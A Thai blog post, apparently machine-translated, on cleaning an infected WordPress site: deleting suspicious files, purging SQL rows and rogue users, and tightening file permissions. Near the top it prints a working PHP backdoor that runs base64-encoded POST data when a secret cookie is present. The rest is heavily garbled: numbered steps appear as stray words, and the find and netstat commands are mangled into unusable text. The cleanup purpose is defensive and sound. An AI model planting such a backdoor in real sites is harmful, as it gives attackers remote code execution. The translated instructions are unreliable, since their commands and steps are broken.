WordPress Exploit - ล้างไฟล์ไวรัส, SQL และความปลอดภัยของเซิร์ฟเวอร์

ก่อนที่คุณจะอ่านบทความนี้คุณจะเห็น โพสต์ที่นี่, เพื่อให้เข้าใจสิ่งที่ :)

ฉันพบมันในไฟล์บล็อกหลายไฟล์บน stealthsettings. com ซึ่งคล้ายกับรหัสด้านล่างซึ่งเป็นผลมาจากไวรัสด้วย ความสำเร็จของ WordPress.:

si

<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?>

ถ้าข้างต้นเป็นเรื่องเกี่ยวกับไฟล์ xmlrpc.php จาก ง่วงนอน, ที่ grep เซิร์ฟเวอร์ดูเหมือนค่อนข้างมากชนิดนี้ในรหัสแหล่งที่มา

ทำความสะอาดไฟล์ที่ติดเชื้อ:

Ooookkkk ...
ฮิต ทางออกที่ดีที่สุดเท่าที่มันจะทำ การสำรองข้อมูลและทำความสะอาดฐานข้อมูลคือการ เอาออก ไฟล์ WordPress (คุณสามารถเก็บ wp-config.php และไฟล์ที่ไม่เกี่ยวข้องกับแพลตฟอร์ม wp อย่างเคร่งครัดหลังจากตรวจสอบอย่างรอบคอบแล้ว) จากเซิร์ฟเวอร์และอัปโหลดไฟล์ต้นฉบับจากเวอร์ชัน 2.5.1 (ในโอกาสนี้และทำให้ไฟล์ wp ปรับรุ่น :)) http://wordpress.org/download/ . เช็ดรวมถึงไฟล์รูปแบบถ้าคุณไม่เชื่อว่าคุณสามารถตรวจสอบพวกเขาอย่างระมัดระวัง

มันดูเหมือนว่าจะได้รับผลกระทบและไฟล์ในรูปแบบที่ไม่ได้ถูกนำมาใช้ก่อนในบล็อกและเพียงแค่เปลี่ยนรูปแบบที่ไม่สามารถแก้ปัญหานี้

./andreea/wp-content/themes/default/index.php:

ฮิต ค้นหาและลบไฟล์ทั้งหมดที่มี... * _new.php * _old.php * Jpgg * Giff * Pngg และไฟล์ WP-info.txt ถ้ามี

หา. - ชื่อ“ * _new.php”
หา. - ชื่อ“ * _old.php”
หา. - ชื่อ "* .jpgg"
หา. - ชื่อ“ * _giff”
หา. - ชื่อ“ * _pngg”
หา. - ชื่อ“ wp-info.txt”

ฮิต ใน / Tmp , ค้นหาและลบโฟลเดอร์เช่น tmpYwbzT2

การทำความสะอาด SQL :

ฮิต ในตารางตาราง wp_options ตรวจสอบและลบเส้น: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2. ทั้งหมดใน wp_options, ไปที่ active_plugins และลบถ้ามีปลั๊กอินที่จะสิ้นสุดลงในหนึ่งของนามสกุล * _new.php * _old.php *. jpgg * pngg. Giff *. หรือถ้านามสกุลอื่นเป็นผู้ต้องสงสัยให้ตรวจสอบอย่างรอบคอบ

ฮิต ตาราง wp_users, ดูว่ามีผู้ใช้ที่ยังไม่ได้เขียนอะไรในสิทธิของคอลัมน์ของเขา user_nicename. ลบผู้ใช้รายนี้ แต่จำหมายเลขในคอลัมน์ ID ผู้ใช้รายนี้มีแนวโน้มที่จะใช้ "WordPress” คา user_login และมีมันถูกสร้างขึ้นบนฮิต: ฮิต: ฮิตฮิตฮิต--ฮิต

ฮิต ไปที่ตาราง wp_usermeta และลบทุกเส้นที่เป็น ID ดังกล่าวข้างต้น

หลังจากคุณล้างข้อมูล sql เสร็จแล้วให้ปิดใช้งานและเปิดใช้งานปลั๊กอินใด ๆ (ในบล็อก -> แดชบอร์ด -> ปลั๊กอิน)

เซิร์ฟเวอร์ที่ปลอดภัย:

ฮิต ดูสิ่งที่ไดเรกทอรีและไฟล์ "สามารถเขียนได้"(chmod 777) และลองใส่ a chmod ซึ่งจะไม่อนุญาตให้เขียนในระดับใด ๆ อีกต่อไป (chmod 644 เป็นต้น)

หา -Perm-ฮิตคำสั่ง ls-

ฮิต ดูว่าไฟล์ถูกตั้งบิต suid หรือ sgid . หากคุณไม่ได้ใช้ไฟล์เหล่านั้นวางอยู่บนพวกเขา chmod 0 หรือถอนการติดตั้งแพคเกจที่มี พวกเขาจะมีอันตรายมากเพราะพวกเขาดำเนินการสิทธิ "กลุ่ม"หรือ"ราก"และไม่ได้อยู่กับสิทธิ์ของผู้ใช้ปกติท​​ี่จะเรียกใช้ไฟล์ที่

หา / ประเภท F-ดัด-ฮิตคำสั่ง ls-
หา / ประเภท F-ดัด-ฮิตคำสั่ง ls-

ฮิต ตรวจสอบสิ่งที่พอร์ตที่เปิดและพยายามที่จะปิดหรือความปลอดภัยของคนที่ไม่ได้ใช้

netstat-| grep-i ฟัง

มาก ฉันเห็น บล็อกบางคนไม่ได้รับอนุญาต de Google Search และคนอื่นบอกว่า "เขาทำได้ดี!!!" . ฉันจะทำเพื่อพวกเขา ... แต่คุณจะว่าอย่างไรถ้า Google เริ่มแบน เว็บไซต์ทั้งหมด การขึ้นรูป  SE SPAM และใส่โทรจัน (Trojan.Clicker.HTML) ในคุกกี้?